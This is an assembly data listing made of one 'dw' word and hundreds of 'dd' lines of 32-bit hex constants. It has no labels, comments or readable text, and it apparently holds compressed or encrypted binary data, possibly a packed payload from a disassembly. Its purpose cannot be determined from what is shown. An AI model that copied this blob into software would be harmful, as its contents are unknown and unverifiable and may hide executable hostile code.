dw 0B3CDh
dd 59E21FE8h, 887ABEEBh, 7D0EF7EFh, 9FA7FC3h, 0FEFDF013h
dd 6D6D43FFh, 674D6170h, 6F656C69h, 0D8F25F0Bh, 272D9586h
dd 1BFD1453h, 59191817h, 6A7C7969h, 4757657Ah, 2664504Dh
dd 0A3FFD774h, 6E186CAEh, 323CD82Fh, 53723433h, 49587443h
dd 4C4F794Fh, 11413250h, 0C3CC92BCh, 4A097D03h, 4E4D3CA3h
dd 2691D54Fh, 0C3AA0472h, 5A196D13h, 4E289CDEh, 73B3E5D2h
dd 36EF6423h, 6A078098h, 12866C6Bh, 474DE590h, 0F3827433h
dd 7A394C46h, 0FE7D7C7Bh, 370C9E0Bh, 86C5B0B6h, 8EADF40Ch
dd 1306292Fh, 92D1A93Dh, 0AF232118h, 271298D7h, 9EDDA521h
dd 0C8FB63C2h, 0CCA5CEA3h, 0C2A9C2A7h, 0AEA9ACAAh, 0B2DB7424h
dd 3DB9DEE3h, 0EC5B4773h, 0BE8EE3EFh, 2A08F3BFh, 393A3B19h
dd 0DB685D4Ah, 9F9FCC8Bh, 472E809Eh, 0D695E193h, 19F91C54h
dd 81642E51h, 0D2E1E0FDh, 30E7A4F3h, 422A1105h, 5B9519C0h
dd 316900E7h, 56D8E0BEh, 0DFA2C87Fh, 0DEC5395Bh, 0F39CFB37h
dd 55BD545Fh, 0BB50D2C6h, 0D070D383h, 6189A07Eh, 0F9C55529h
dd 7801EA0Dh, 40F0CD30h, 3910EEh, 0C35B63A5h, 2A318B2Ch
dd 0C660F582h, 0FFA98052h, 96181F6Eh, 37283BBFh, 5E70B4AEh
dd 6A4781F7h, 26FD5775h, 0DE840710h, 2FB55CD6h, 96C6BFEFh
dd 0B66DC46Fh, 0B0952F54h, 16E68F33h, 0AA790097h, 338DF182h
dd 0A459D82Fh, 0A4953CAAh, 0FA7C7F27h, 134DA4AEh, 0B25473Fh
dd 0C9FA53ADh, 5299453Ah, 9B694ABh, 8ADB4C36h, 2E985D23h
dd 5F0920D7h, 36BF87EEh, 0E5E45B1Fh, 9E09CF51h, 6AD32CDCh
dd 4B4474F8h, 0EAEB253Ah, 85FE0F03h, 0E27EC91Bh, 19163A5h
dd 3B618B57h, 0CE509393h, 81D9F042h, 66F8F46Fh, 3433FCC0h
dd 4A2639Ch, 0FA484A87h, 0B6ED403Bh, 5B01E837h, 0AE30F3F3h
dd 0A7F9D022h, 3D9FB4Bh, 804EA711h, 4E7DEC43h, 0D86904A7h
dd 1A25A51Bh, 2A20A228h, 0DF852DBBh, 928C8F37h, 0EBD545Eh
dd 0A50B805h, 9BA5C95Ch, 5761E007h, 1F2D84FBh, 653ED6CBh
dd 0DD3CCC59h, 1D333ADDh, 6A888DEh, 0E980732Fh, 0BBA5C100h
dd 7DA9C027h, 29F3935Fh, 0BAE7E040h, 4A0BEC13h, 82157CB3h
dd 1375C1D4h, 0FF9CF80Fh, 0EEF50B90h, 0AF446934h, 0B62DF16Bh
dd 3212636Eh, 7E258E35h, 9781AD14h, 9DD744Bh, 95CFDBEBh
dd 1A10B73Ch, 0CDE9C012h, 13C2E5EBh, 0FAE17B6Ah, 6BED29D8h
dd 3266F0F7h, 4B81BEAh, 1D178BCh, 6E4004A6h, 0D3799FC7h
dd 454481F4h, 97CAA85Fh, 0BEA5796Fh, 1346D9B4h, 30983BCAh
dd 42F1589Ch, 0F1AA01F1h, 0C467FD6Ah, 9906241Bh, 0E3978855h
dd 1DC11C6Ch, 42B3B396h, 0CC2A2DA8h, 478912CFh, 2E2003D6h
dd 92559987h, 0E266443Bh, 0A44CECD2h, 985AF30Ch, 6FFD1DBCh
dd 865DF48Bh, 0AD3CF389h, 0AA271747h, 50C2660Bh, 7ECD0EE0h
dd 7A21A1B1h, 0DEEFE058h, 0C273B4BCh, 66BD1403h, 5B11D207h
dd 0FEFB36F1h, 676975B8h, 757584BBh, 54A9685Bh, 0B565CC5Ah
dd 69393A03h, 2CDD5E87h, 7873F22Fh, 40BD7CE9h, 18A9C00Eh
dd 2967F5DBh, 5E74F7EFh, 4145AC26h, 8DA6B5AEh, 0D90073AFh
dd 4AA475B0h, 57B55CF3h, 12C9AA73h, 139E2B30h, 0CA81855Eh
dd 0FBA88C33h, 0A23904DBh, 935094F4h, 6A71C08Fh, 5200C391h
dd 0DAE9C012h, 964DE48Dh, 91CE27B3h, 2C55DC26h, 2EF086DEh
dd 0B058F38Eh, 0EFA454EEh, 0D125DC62h, 923C2852h, 3A288D7Bh
dd 4A41E82Ah, 0D4C526E7h, 8E2C2FA8h, 431DF4FEh, 9584476Fh
dd 58579695h, 98FDCBB1h, 4765765Ah, 6961883Fh, 0FCA028F6h
dd 7089D702h, 0CA14A2C2h, 0CAF41FAAh, 22A06335h, 194960B2h
dd 60BB12FFh, 0A556BE0Fh, 0BE90DC66h, 323D1317h, 0BAC80BDCh
dd 80B118DAh, 0B117D643h, 0F25C7032h, 17E5DD1Bh, 51B6C87Fh
dd 0FA89A532h, 57E62763h, 66FD21C7h, 0AFD24E3Ch, 0AEB56A9Fh
dd 0ADDEB447h, 0B618346Eh, 0EE01AD9Fh, 0C0E68A6Fh, 1DD722D3h
dd 2C95103Fh, 0D55BF22Fh, 0CEE0D416h, 6694567h, 0EBE53707h
dd 89E108BBh, 2EA67DDAh, 0B465B5CEh, 0E88546Bh, 47BF39CEh
dd 0BAE51CE3h, 4298F657h, 239297EBh, 0DAC15DB7h, 0A7C4CF6h
dd 860DEF98h, 3A58FB03h, 82319859h, 316AC16Fh, 0E7C7F74h
dd 7D4DA4AEh, 0D265C967h, 905AC52h, 77A56548h, 3D494ABh
dd 72EC774h, 762DDC6Ah, 0FBC7609Fh, 7BC8047Bh, 1A40A81Fh
dd 0BEE54CB3h, 62B9D057h, 904CB4CBh, 0E264E7FCh, 0A555BC36h
dd 32ADECBEh, 0B86FDF2Eh, 5B23D4FCh, 0FF8B09E0h, 4DBDD51Ah
dd 0C518BEC9h, 9DCD0BBBh, 386AAE50h, 0E73D52EEh, 429E283Bh
dd 3464842Dh, 9BD74FF3h, 649CE476h, 0C73898E2h, 8FC31BEFh
dd 870C822h, 0FF0C6CCEh, 7FBD147Ah, 7A60AF11h, 0BFE05E90h
dd 0B0491543h, 15D87704h, 4951F97Ch, 0DA9439D1h, 3FECB222h
dd 0A248F094h, 0FBA45AF7h, 4C26CC57h, 874D31B2h, 23EF5C1Fh
dd 6971FC4Eh, 0FAB419F1h, 1DC69402h, 0BA68CCB7h, 0E9D33BCFh
dd 6D358D7Dh, 822D5F9Fh, 52942C6Eh, 2F63901Bh, 0A8B57882h
dd 46ACCC6Eh, 0E208A9D2h, 0A9F83BB0h, 2A48E907h, 0A21C7DFEh
dd 40A9114Ch, 2B54B406h, 0A7E748B7h, 579DF545h, 0D14DA5E8h
dd 93E73C9Ah, 3756C93Fh, 59995CDh, 8F7BE08Eh, 0E3855DE3h
dd 6975B94Eh, 0BD4414A2h, 13C1711Fh, 7E2FC957h, 0BEA429DFh
dd 36CDB510h, 806DD9AEh, 0E49474C6h, 4F309162h, 864C07E7h
dd 26E0410Fh, 5215E96Fh, 0FB826CD2h, 70BCE603h, 0C812BDD8h
dd 0BEF43FCFh, 1D47F935h, 0D7274FEEh, 7AED0543h, 16658930h
dd 9FD76E9Ah, 22B8E965h, 0D02D95C6h, 0A5C63D86h, 227CFA25h
dd 0C22600C2h, 7F8B0A7Eh, 1B6CAD13h, 0B0EC5CA3h, 8D193150h
dd 36D3711Bh, 6F32D77Dh, 0FEF52FD0h, 37EA8F35h, 0C41EF788h
dd 0E9B341D9h, 4C35CC47h, 915C33B8h, 8AF0738h, 2A05E04Ah
dd 0C8A119D0h, 33CCAC0Eh, 0BF7FD0AFh, 0DF957DDDh, 4D45AD60h
dd 0EB1F4492h, 4FA93147h, 19119D22h, 9ED0798Fh, 61B0F307h
dd 0E200A1CFh, 8EE405B6h, 124CCA1Ch, 0CF1044F2h, 6888746Eh
dd 3C41B902h, 81E259AAh, 5E80C641h, 0FF1BE4FEh, 9BD43C8Dh
dd 3269ED3Fh, 159993D8h, 8349FD99h, 0EFBD51C9h, 6F019223h
dd 0A17C0AA3h, 1FDF540Fh, 7F2DC169h, 0EA9629D4h, 0CDCBB38h
dd 8569FACBh, 0DE907DDDh, 623CBA66h, 86674082h, 37E85618h
dd 4831ED4Bh, 0EDA00FFCh, 7697B004h, 0C718A6E8h, 0B8C11DBBh
dd 1D50FF0Ch, 923165F4h, 44AE3075h, 3F75893Ah, 8AC669A0h
dd 2297FF7Eh, 0E71080C5h, 8FD80E9Fh, 1D73F334h, 0DB1D63C2h
dd 58CD0A74h, 1F51870Bh, 0B2EC6ABDh, 0B6577052h, 8D86424h
dd 693ECA5Fh, 0FA862FC6h, 3CEC8B28h, 0A659CAFBh, 0FFB547EDh
dd 5733B850h, 834C24A5h, 2BF87927h, 2A08EA40h, 0FC8208CDh
dd 24CCB40Eh, 0A379D6B2h, 0DFAC64DEh, 6737837Eh, 0EE2D62F7h
dd 45943A7Eh, 19749C20h, 80DC6E97h, 53A6F460h, 0E504B7D5h
dd 0B4E81AABh, 2D728C14h, 0C30D43D6h, 76A80079h, 55DBB6Fh
dd 0A1E659B0h, 468CEB44h, 0F822879Bh, 8EC22D91h, 2A60CB53h
dd 36EA9FDFh, 8753ED89h, 0F8D15DE2h, 2E03BF46h, 0B66705B4h
dd 15C2777Bh, 1A35CD74h, 0DB9122FAh, 16DCBE25h, 0B572D888h
dd 0C49050CAh, 0E309067h, 975D2EAEh, 22E84A29h, 7915ED78h
dd 0FBAB02FCh, 66BCC414h, 0D21CA0F8h, 0A4D878AAh, 47F917h
dd 0E20654E2h, 36AC2A5Eh, 3F758616h, 8AC06281h, 4C9CE058h
dd 0C73186DEh, 9EDF11EFh
dd 2B7BCE26h, 0D30C52D3h, 7AA4227Fh, 3E60C81Ah, 97D56D85h
dd 86374204h, 34BD5827h, 6612DF6Ah, 0E5902FCCh, 899922h
dd 8662E39Eh, 0FF8A46FAh, 7F1D894Ah, 855C02D7h, 34F8411Ah
dd 4610CE56h, 0F69019F6h, 17FBC026h, 0A268F7BCh, 0CF8D69E9h
dd 5F3DA976h, 87B0B3F7h, 4EAC9C00h, 0A211F84Fh, 0ED91506Eh
dd 17A3A06Dh, 0DC3E94EAh, 8A4DE3DAh, 2A7558F8h, 0F02850FDh
dd 0F6488B58h, 0E931985Ah, 5B6A3007h, 32A9B5D3h, 55452018h
dd 4B24C5A8h, 6D05EC46h, 42F3A048h, 73C29A81h, 8A910D2Bh
dd 0AA7A1CA6h, 0D2096057h, 1F636C2Bh, 0CECAA81Fh, 726E4CD9h
dd 62D1903Dh, 0AC1DA4CBh, 0AA9B4AADh, 0E3C326Bh, 0A3292AE7h
dd 0C3727408h, 3A21BDDBh, 0B3A35CCh, 299854Bh, 0FA092B2Eh
dd 0DF19F544h, 62D69C23h, 8249B50Ah, 0E7EE447Bh, 88FEBB08h
dd 0CB718978h, 0AD749057h, 865DD71Fh, 154E0C07h, 0A69037BCh
dd 3F694092h, 16EE8594h, 8562207Fh, 5B0ED32Ch, 0C25945EFh
dd 45559BE6h, 38B9B80Fh, 250AA35Ch, 12BC3CC2h, 82ED01FBh
dd 6F4EA594h, 0D665CC10h, 1DC6AFCAh, 85C2F3C0h, 2A71707Ah
dd 0F887C83h, 32B3D48Ah, 5BC497DBh, 0FAFCA63Ah, 4F11BD13h
dd 0D30860A6h, 1391C1D4h, 4E96F80Fh, 0D220E3C7h, 4FC9E032h
dd 0E36DC079h, 0DA816837h, 93A4D173h, 0A2390AD4h, 93508B61h
dd 6A71C261h, 0EE586E93h, 32C38003h, 0F0412018h, 0E0F5CD38h
dd 7EC8AC13h, 58CF7570h, 0E61994ABh, 498C38A5h, 2F1FDD49h
dd 0A1F65338h, 0F3B8FB7Fh, 72B1DCDFh, 0BEE54CB8h, 61E200DCh
dd 7390889Bh, 0AAB102DDh, 0F594688h, 78A240E7h, 568D2553h
dd 0F14A703Ch, 6D0EE7F3h, 7ADD1D1h, 4D8836ECh, 0C556FB0Dh
dd 3DE11734h, 0C619EC0Ch, 64BC0451h, 0CFFE1735h, 0FEE53903h
dd 0A9F55494h, 0C668801Eh, 696673EFh, 49D2BBA9h, 0B28100CDh
dd 0D5CE3392h, 9279D215h, 0DE852CDAh, 687832BAh, 96C8DD95h
dd 4CC4D1CCh, 0ABF51C95h, 1081E8C3h, 0C06B1172h, 783628DFh
dd 3E8D99F0h, 0BF3950D7h, 5D94D9CAh, 0B7FA986Fh, 8E954AC9h
dd 7A8DBCE4h, 6F89ABDBh, 3BE108BFh, 1E47E4FFh, 863164F7h
dd 0D9FD542Ah, 0A2468DAh, 634997E3h, 13CD8483h, 0DC3DC4BBh
dd 0DA8580DFh, 2C738C73h, 5D2E10C3h, 46E8F89Eh, 0E7F8EB6Fh
dd 0CE943854h, 58B8D127h, 9727B599h, 0FAA14897h, 0CBFAFE13h
dd 42D9C5EBh, 92CB117Dh, 0E28568D4h, 2E75DD27h, 0F6BD9F90h
dd 76AD065Bh, 2C693DE0h, 3BBC4CF3h, 81AFA497h, 1296E4DFh
dd 0FBA318C5h, 9BAAAA54h, 0F269752Bh, 234DA102h, 0AF9EDEEFh
dd 9E8559AFh, 509DE7FAh, 0FE39BEFCh, 0CB95EF42h, 5D9E9C63h
dd 0CB594A47h, 66BDEFC8h, 0A51B80Fh, 6B5A5EA3h, 22B9A573h
dd 8455300Ah, 9E4E58EFh, 0DBEAB467h, 0B22936BFh, 0E589B48h
dd 27218849h, 5E852811h, 0C36C7A09h, 0E2309F2Dh, 0E951F81Ah
dd 0AE60D1BAh, 5189A057h, 24D2D22Ah, 12CEE81Bh, 3E65CD2Ch
dd 0E329D4D8h, 781D344Bh, 6C61ED15h, 81D54203h, 72A8C1E3h
dd 0F63324DBh, 3BA7F9CAh, 500CBC2Dh, 91B45B0h, 27BB92E4h
dd 1BDFD300h, 0B8E41C89h, 25C5F54h, 0EF6D848Dh, 5F8EA9E4h
dd 7E258CACh, 0BFDB951Ah, 6B7744Bh, 6A31D407h, 31C66CC3h
dd 72DF90B2h, 9641D99Bh, 7FAE48FFh, 5E05ACECh, 4299415Eh
dd 0B60315EBh, 858771DDh, 2E7579A6h, 0DACFE3C7h, 79A038D7h
dd 1A41319Bh, 0CBC570B3h, 58857CA4h, 0C69131C4h, 0A75C18AFh
dd 2E75DC23h, 974E61DAh, 0FAF2512Fh, 4614A803h, 0BE3A1212h
dd 77ADC41Fh, 0A50355DAh, 0E5BE42BFh, 29F3F416h, 0A3462078h
dd 36CA5481h, 8E31F5Fh, 0CB19990Ch, 0E2CA9057h, 0D60DA4DBh
dd 0EAB15107h, 397AF843h, 0D3066CC9h, 8332647Fh, 7A61FE5Fh
dd 0E8F1EC56h, 4790B904h, 66FD2221h, 851D05Eh, 0FFA4DCA3h
dd 0C776B011h, 0F66DB2DFh, 81C2BD12h, 0D35CC73h, 0B268041Eh
dd 0B9CC6519h, 6A44F4BAh, 0AAD1FB83h, 47955598h, 15F5A49Bh
dd 0AF96853Fh, 0E744EC53h, 0C4166334h, 74BC037Fh, 235CA40Ah
dd 9DDA6E80h, 4EBDC668h, 0D203ADECh, 86F21FB0h, 0C57F930h
dd 0F40D7EF2h, 6FAE066Eh, 2F6DB600h, 0A1F94CBBh, 329BE555h
dd 0F13F85CFh, 95E93C9Ah, 5C05D820h, 17690FB7h, 96ED1B99h
dd 0E3A957FDh, 5C1CF24Eh, 0BE6807A4h, 58D47C1Ah, 5441C46Fh
dd 9EAE0FFAh, 4CDA02Eh, 0A96FC3A0h, 0EFA24DA5h, 3E36DC51h
dd 0C21C70D5h, 76A3046Ah, 175BA811h, 0D08C23D9h, 6BAF9657h
dd 0AC08A0D9h, 0CA91909Ah, 0EF689C63h, 0D254946Ah, 4168823Bh
dd 5A01A84Ah, 0CB31990Ch, 0CA389057h, 0EC618094h, 0BA04D3F1h
dd 1715FC76h, 0C7473C0Bh, 284C0231h, 5954D580h, 0E8C5915Eh
dd 0B4927077h, 184369h, 60D435AAh, 21F51C90h, 12BA70C2h
dd 0B0A47EFBh, 648FA465h, 0DC647DC8h, 6F7ABB18h, 68885CEh
dd 2A1BC82Fh, 1B2A72E9h, 72E9F5C3h, 0DE29D858h, 52CA7DBBh
dd 1E45EC17h, 821A76A4h, 1375C1D4h, 2F9F80Fh, 64AE31Fh
dd 12C9A000h, 0E92E82E8h, 25813B90h, 3E1004E6h, 5E48F897h
dd 50358BF4h, 95CE279Ch, 8E863F4Eh, 32E26827h, 0C518E49Bh
dd 0C8921ABAh, 1249E87Dh, 0DE0C0FB7h, 0E3DD4DEh, 8AD13885h
dd 5C05AF54h, 0B47D0EAEh, 89FD043Ah, 5A74E08Ah, 0EA60C5B3h
dd 6DB99062h, 269039FAh, 23F158B7h, 4E63BA86h, 67D611E7h
dd 56CD11C7h, 3A65E0ACh, 2B486C93h, 299A89Ah, 8AC059F2h
dd 229138F9h, 91CA6AB5h, 0F5CCE7E1h, 0C9ED0426h, 33A46BAFh
dd 0FEA54CEEh, 3FDE059Ah, 0D20DF4CBh, 0EADB5985h, 4E17D411h
dd 279680A7h, 168D522Bh, 0F7B08FAh, 8408A1F1h, 9019302Ah
dd 0D3301201h, 0A11A568h, 0FEA50AF7h, 0C776B216h, 0F66DB2CFh
dd 0B654D7C7h, 0F8658C05h, 0A2011D52h, 4A75344Bh, 7D71982Fh
dd 0C59633D0h, 3687F254h, 290DE897h, 0FAD4942Ah, 192D7F13h
dd 0F5930F7h, 66E5109Eh, 0F79CA14Fh, 0EEF5291Fh, 0ED3FF1EFh
dd 0B6612C44h, 93D668DFh, 3B6BC53Dh, 0EE3D3EC3h, 93227447h
dd 6A71EDF3h, 4A9AFC46h, 32E981C0h, 96488C08h, 4F2C48FFh
dd 5E45B4D1h, 5A247DEEh, 0E3DD4DDh, 752ECE95h, 186961A0h
dd 0DD096087h, 76ACC6FFh, 8AAD291Fh, 0EAE54CB2h, 62B8D13Fh
dd 3A884BCBh, 2BF1589Ah, 0E546CC7h, 26A210E7h, 0A9DF2431h
dd 7A5794AAh, 0C705E993h, 8AB1BD02h, 597DD4B8h, 8AA4C45Ah
dd 0EDD77763h, 0D254493Ah, 1F98443Bh, 476C6DD2h, 1F50CB3h
dd 62CF9882h, 899D718Bh, 0EAB0636Bh, 42553743h, 8296002Ch
dd 0BA4E194h, 0FFE7C83Fh, 0DEC5149Eh, 0A8191A36h, 99BF7E6Ah
dd 4A67AC9Ah, 510DDFA3h, 539B6448h, 7BBE84FBh, 0DADC4D0Ah
dd 6C75A633h, 0E6ACAF84h, 0C39D747Dh, 0D8F497EFh, 3D57C83h
dd 32B446DAh, 3E0515DBh, 451EF203h, 1E45787Bh, 64726EF7h
dd 72D960A2h, 7F896DB0h, 53381CA3h, 1289BD93h, 2B85C50Ah
dd 517E9725h, 0BF35A837h, 0E6721877h, 0E61C702Fh, 4E75D367h
dd 0CB7D6CCBh, 17E98027h, 9635D2B5h, 0AE34B7A8h, 0DD05EC66h
dd 55FFC73h, 73B0B4EDh, 8A91250Eh, 0F1DDC49h, 800960C7h
dd 6638FB28h, 9741E829h, 0E9F168CFh, 57E145A8h, 0C2DBB48Bh
dd 0C0B11297h, 5D02AC03h, 0C439D518h, 0B08E241Bh, 27C335B2h
dd 9EAF6CD3h, 2D9BC1Fh, 592E83ABh, 8AA7685Ah, 6E39A163h
dd 0DF3C2087h, 0A3F1B6h, 0D78CE81Fh, 0FEE534BEh, 22935E3Ch
dd 790EA2DAh, 0AA87547Ah
dd 4EED3F43h, 39F82FD9h, 5878E9E5h, 0CA218849h, 0AB2BDEDEh
dd 3AF11027h, 742EB91h, 3B2AF7Dh, 45F42B2Eh, 79466BADh
dd 0B8900935h, 69C168A9h, 0D5924B97h, 77C6036Eh, 46DD024Bh
dd 3F0625AFh, 0FAD47CC3h, 799A84Dh, 43F2A4DBh, 0BAA13D03h
dd 26085193h, 0F65930B7h, 4F78933Ah, 4A11B852h, 28B51CE3h
dd 52F1ED82h, 0E084C4BBh, 1D7E9721h, 3E300CF6h, 0A2791097h
dd 21F298Bh, 253BD56Fh, 0A1FA52E3h, 5486A049h, 0F02488BBh
dd 0B581699Ah, 336CD873h, 2DEDD0D2h, 8A58F7CBh, 0EBA35AEAh
dd 2354B957h, 0F22940CDh, 56E2245Bh, 772CDD6Ch, 0D9C53ED6h
dd 7DDA236h, 0CC1095A5h, 0CF9D7DFDh, 6B39886Dh, 8B453394h
dd 26EC4C7Bh, 5B41F14Fh, 0FBE508FDh, 61BCC00Fh, 0D213B5DFh
dd 0BEE258E3h, 751F202h, 0B27347E9h, 61E74916h, 32629C3Eh
dd 0DEC2629Ah, 295FC76h, 0A62495EFh, 0CAD5368Eh, 2672D52Dh
dd 0D4492CD3h, 70ED1674h, 1444A10Dh, 97A55FB7h, 0AB780717h
dd 6CB02E1Fh, 7834D058h, 0DC947CC6h, 3DF0C022h, 900DA88Eh
dd 0F4A441EDh, 1E5ABF57h, 87543F94h, 32D4146Ah, 0A02F10Fh
dd 0EBB815F7h, 6E0E046h, 0BA2DD7FCh, 9B847CDEh, 0DD9CE61Eh
dd 0FBB4C3F4h, 32D41BFFh, 0CE15E8E9h, 94012C24h, 0E82CA50Ch
dd 0E425E30Ah, 77C628E8h, 0A406EEEAh, 0CBA6B56Dh, 12CE27A4h
dd 935BC8C9h, 97C25CADh, 0FEB5BA8Ch, 4DA926F7h, 3BDF502Ah
dd 0ED57B620h, 4299280Fh, 0E63D94EBh, 8AD1388Fh, 2E75DC23h
dd 0D20960C7h, 76AD047Bh, 1A41A81Fh, 0BEE54CB3h, 62B9D057h
dd 0C61DB4CBh, 0AAF118AFh, 0E55FC03h, 0F22940E7h, 568D245Bh
dd 3A61883Fh, 1DA56C93h, 42E016D2h, 3FED4ABh, 0CAD14165h
dd 2D829363h, 8A1AAD93h, 30A6F334h, 1E8A385Ch, 0BC8E28D7h
dd 19E0E21Bh, 922EFCC9h, 0C1A51A64h, 0DB9CB001h, 0B2293901h
dd 2F67E192h, 7FCAC83Fh, 3CADEE50h, 0C6DB11EEh, 91389C6Bh
dd 0E251F82Dh, 0AEF55CC7h, 5289FF2Fh, 0D2A809FBh, 0C3C168BDh
dd 3211D40Ah, 3D9054h, 0C818CBBCh, 0E971D816h, 3D6A574h
dd 72E9E290h, 0A6F2B438h, 39E18743h, 0E8A7E8FBh, 0A07DAD7Eh
dd 1C7E546Bh, 61148C4Fh, 0FEC71FD1h, 4A35EE8Ah, 8CEE9AE0h
dd 25851CDFh, 81266741h, 0F59100E5h, 2D228BF4h, 0C0BCF3A1h
dd 96957CFAh, 0F1DDCB24h, 0AFDF6114h, 7F6648BFh, 5E4595DDh
dd 4299F0B7h, 0E63DA803h, 454B38Fh, 0C6759C1Ah, 2DF697B2h
dd 76AD1C93h, 94FC2B1Fh, 0BEE50C8Ah, 0FF30D822h, 0C65D966Bh
dd 270E8444h, 0E15C58Dh, 60ACCF24h, 0DF8D6462h, 7A5806AAh
dd 9EC68493h, 0CBEAB077h, 26EE5F68h, 989178CFh, 91CB718Bh
dd 38DC2378h, 35ED0402h, 567B6B89h, 0F92103F3h, 0A1F99016h
dd 895DE4F1h, 0EAB1A56Bh, 42573743h, 4CA1E8F7h, 93CE9BE4h
dd 7A61F1D5h, 54D5EAD0h, 0C2E0F03Fh, 9F3D0D1Fh, 4A52CC21h
dd 0E67EAD48h, 8D686146h, 77F25B24h, 0D68D6C66h, 6789B933h
dd 1BBA98FCh, 0F1123BB1h, 4C71982Fh, 0BD2B0402h, 0D92CCF55h
dd 800DA4DBh, 0CFE1323Ch, 0E0F6716h, 88D2321Ch, 0CEACA528h
dd 0B5EE063Dh, 0D71FA9E0h, 9764A047h, 0B996BC7Bh, 0DA81EC5Bh
dd 0D4907373h, 0F27950AEh, 0F92321E3h, 0C0B4DB90h, 41957CFAh
dd 72D02AA2h, 0B249E79Bh, 0F861CBACh, 0E80A7760h, 0C28B13BFh
dd 276EB422h, 0A3D51CABh, 225CF83Fh, 39493BE3h, 79568592h
dd 6E9C13C8h, 161ECD8Dh, 1662BE12h, 9FE635FDh, 0DE0EB994h
dd 0D8AE7D2Dh, 8685F5C5h, 0C576A57Dh, 4E92D0D6h, 0E33EED8Dh
dd 762AE89Eh, 0E08655BDh, 0BE705DF0h, 5ECE1D6Dh, 0E6A805B8h
dd 0A478BB3Dh, 101A866h, 15A7D1Ah, 0E07ACEE8h, 78B21D9Fh
dd 0E972A710h, 0A64DB829h, 4D96F6B2h, 321CF193h, 0C247C83Fh
dd 3C8734E2h, 0C01A94F7h, 0C167289h, 0F0B9E009h, 2D0AA356h
dd 830EE885h, 1E758191h, 653EDD72h, 4D6636B3h, 0E069E0DCh
dd 6B9E5CEh, 0D9A322Fh, 248D14E9h, 7AA3AE7h, 3E1C14C3h
dd 451EFD72h, 1E45EDABh, 0F68BB4F7h, 0D81D8526h, 0A1E71385h
dd 0EEB5A4E6h, 0F0622007h, 0BE00704h, 0DAC15CE3h, 4A140984h
dd 0A27910D7h, 5A9F40Bh, 9D9BB8DFh, 8EA10D46h, 32E98327h
dd 60C9EB9Ah, 42A148FFh, 0B6E92706h, 0FF105B1Ch, 0E67DAD7Dh
dd 217BD03Fh, 1A4459D4h, 0D2096087h, 0CB24057Bh, 1A019185h
dd 3B1207C7h, 62F9E466h, 0C41DB4CBh, 55957F17h, 0B6508935h
dd 0DCA22480h, 563542F0h, 4ECAEE3Fh, 3498DC90h, 36E83580h
dd 0A67DD4EBh, 472970CFh, 1B35940Eh, 0A3CCD791h, 36ED040Fh
dd 0E205E85Fh, 0FEADC970h, 0A1419563h, 2D5D0C66h, 0DB34AFA0h
dd 4D15FC77h, 0C66900A7h, 0BC24D41Fh, 0ECA443D4h, 55856CEAh
dd 4BD15BF8h, 0E34AE823h, 0A118C3Eh, 0AEF55CA0h, 3531BF33h
dd 7F1B7B9Fh, 0DAF8B622h, 3EDD6733h, 495D37D7h, 46BBBDF3h
dd 9799332Fh, 3E2A837Dh, 8E662847h, 0EFEE5B24h, 0AF1EB0D9h
dd 0B5D44775h, 0B668A57Ch, 0F40A546Bh, 4A123AB8h, 0FAC01CE3h
dd 0ED3737EFh, 5E727444h, 257E9476h, 6BDA3415h, 9E8BBF1h
dd 8356BB80h, 6A71E1F1h, 861CF4E8h, 36C77DBh, 924DA4AFh
dd 8EA148FFh, 9E2C1441h, 0FA323849h, 0E24954E3h, 72A48024h
dd 0D9DEBBC8h, 923D5142h, 76AD0C7Bh, 9A0BDD1Fh, 0FED1630Eh
dd 23CDD057h, 0EF059D73h, 81541266h, 0CE55BC37h, 57234303h
dd 56CD1070h, 90D03894h, 0AAEAE919h, 0B273B037h, 8DF8DEEBh
dd 609138FBh, 93D72405h, 0A678A570h, 36FD447Bh, 5D75E85Fh
dd 980F4543h, 4405E5AFh, 2CB54420h, 631A98DCh, 0E2C3EFEh
dd 83ECF7A7h, 36CD242Fh, 0F21C87Fh, 0D4DD9CDAh, 822D59B2h
dd 0DEDBBE6Bh, 8FA6788Eh, 0AEB56892h, 5289E007h, 32AD878Fh
dd 0B36422B7h, 58658C07h, 6484D97Ch, 0ED9D7472h, 1E401DD8h
dd 8ED57CC3h, 7BDC8067h, 530FF46Bh, 0BAA13C96h, 2FC01BB9h
dd 25970C3h, 53FD542Bh, 40A94844h, 0AE813666h, 2F220A07h
dd 0AE5C7CDDh, 0EEB0ED28h, 7F258C33h, 0A00D1097h, 0A3D75DBBh
dd 6A71EC45h, 0C496D803h, 72DDAA82h, 0F0E6829Bh, 0D51C947h
dd 1E319DD6h, 429BF0B7h, 523FE1EBh, 0A0743247h, 48759C17h
dd 70B4E96Ch, 0CEAD4442h, 1A418C23h, 8F60BB18h, 6AB99063h
dd 0B21DB4CBh, 9B74EFC3h, 0E55BC37h, 872940E3h, 5C359450h
dd 7A55A3BAh, 0D32EC693h, 36E83580h, 0AE7DD4EBh, 0DBE478CFh
dd 8EB62405h, 0A662858Dh, 9D8B447Bh, 0B1AB286Ch, 0D71D6AE6h
dd 95C9A0Fh, 465DB4BFh, 4FBB5B0Bh, 4E558868h, 379EABC1h
dd 168D502Ah, 7A21D87Fh, 1E0494B5h, 6997343h, 4D181E63h
dd 6C51F83Bh, 2B435308h, 52C9D468h, 0C7A87350h, 9AC168ABh
dd 4A25CC33h, 0E069E0DEh, 6A91DCEh, 0AF86322Fh, 8E9548B2h
dd 72A9E067h, 0D478226Bh, 0F56C0CBBh, 37E066EDh, 0B5970C3h
dd 66C4DEA6h, 0CABA9E4Fh, 0E9C0191Fh, 5D49A0B7h, 41C78444h
dd 9AB5595Ah, 7E658C73h, 0C4C17697h, 0B2DF013Ah, 0DA9ABE46h
dd 0E51036DBh, 0F2E9C013h, 26E7E77Bh, 0CB24BF77h, 5E05EC67h
dd 3799F037h, 6CBB24E9h, 0CAE5112Ah, 0AEDEBA23h, 0D57C653Bh
dd 392D04CBh, 0EDEBE8E0h, 0FED17D36h, 63B9D057h, 7616C1CBh
dd 837412EFh, 0A455BC37h, 4A4F4F0Ch, 0F387E4D8h, 3A21BC16h
dd 9F75C7F5h, 335C47DDh, 0A67D949Fh, 0BF917ACFh, 5FB06B4Ch
dd 924960B3h, 43ED403Bh, 50C15845h, 0BE912776h, 125C1A17h
dd 475DB4BFh, 52D7480Fh
dd 0FEBE3D25h, 261EBA7h, 3D486E5Bh, 0D021884Bh, 0EAB4A924h
dd 0C2197077h, 76C81463h, 0E2D20069h, 9ADFF9A9h, 0F9EFE007h
dd 0FEC6854Bh, 1FCB602Fh, 3E25F819h, 0D3BCA77Dh, 469D747Fh
dd 9B71882Fh, 0E8F009F6h, 785143DFh, 96398E7Eh, 894A6EBFh
